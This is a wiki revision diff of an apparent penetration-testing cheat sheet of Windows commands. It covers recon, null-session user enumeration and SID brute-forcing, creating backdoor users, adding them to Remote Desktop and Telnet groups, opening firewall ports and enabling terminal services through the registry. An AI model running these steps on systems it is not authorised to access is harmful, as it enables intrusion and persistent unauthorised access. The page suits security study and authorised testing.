Difference between revisions of "Windows Commands"
Jump to navigation
Jump to search
Line 90: | Line 90: | ||
Adding a user to a group | Adding a user to a group | ||
<pre>net localgroup & | <pre>net localgroup <groupname> <username> /add</pre> | ||
Adding a user to the telnet users group | Adding a user to the telnet users group | ||
Line 99: | Line 99: | ||
Adding a user to the terminal services group | Adding a user to the terminal services group | ||
<pre>net localgroup "Remote Desktop Users" <username> /add | <pre>net localgroup "Remote Desktop Users" <username> /add | ||
===Firewall interaction=== | |||
Opening the firewall for telnet | |||
<pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address></pre> | |||
Opening the firewall for terminal services | |||
<pre>netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address></pre> | |||
Opening the firewall for SSH | |||
<pre>netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address></pre> | |||
===Firewall interaction=== | ===Firewall interaction=== |
Revision as of 21:03, 17 July 2008
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode:
nslookup > [name or ip] > server [server ip] > set type=any > ls -d [target_domain] [> filename] > view [filename]
- No recurse:
> set norecurse > set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
Null session
- Establishing a null session
net use \\<target> "" /u:""
- Pulling credentials
enum -U <target> enum -G <target>
- user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
- sid2user
- Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename> sc qc <servicename>
Start a service
sc config <servicename> start= auto sc start <servicename> Starting telnet <pre>sc query tlntsvr sc config tlntsvr start= auto sc start tlntsvr
Starting terminal services
sc query termservice sc config termservice start= auto sc start termservice
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add net localgroup TelnetClients /add net localgroup TelnetClients <username> /add Adding a user to the terminal services group <pre>net localgroup "Remote Desktop Users" <username> /add ===Firewall interaction=== Opening the firewall for telnet <pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Firewall interaction
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"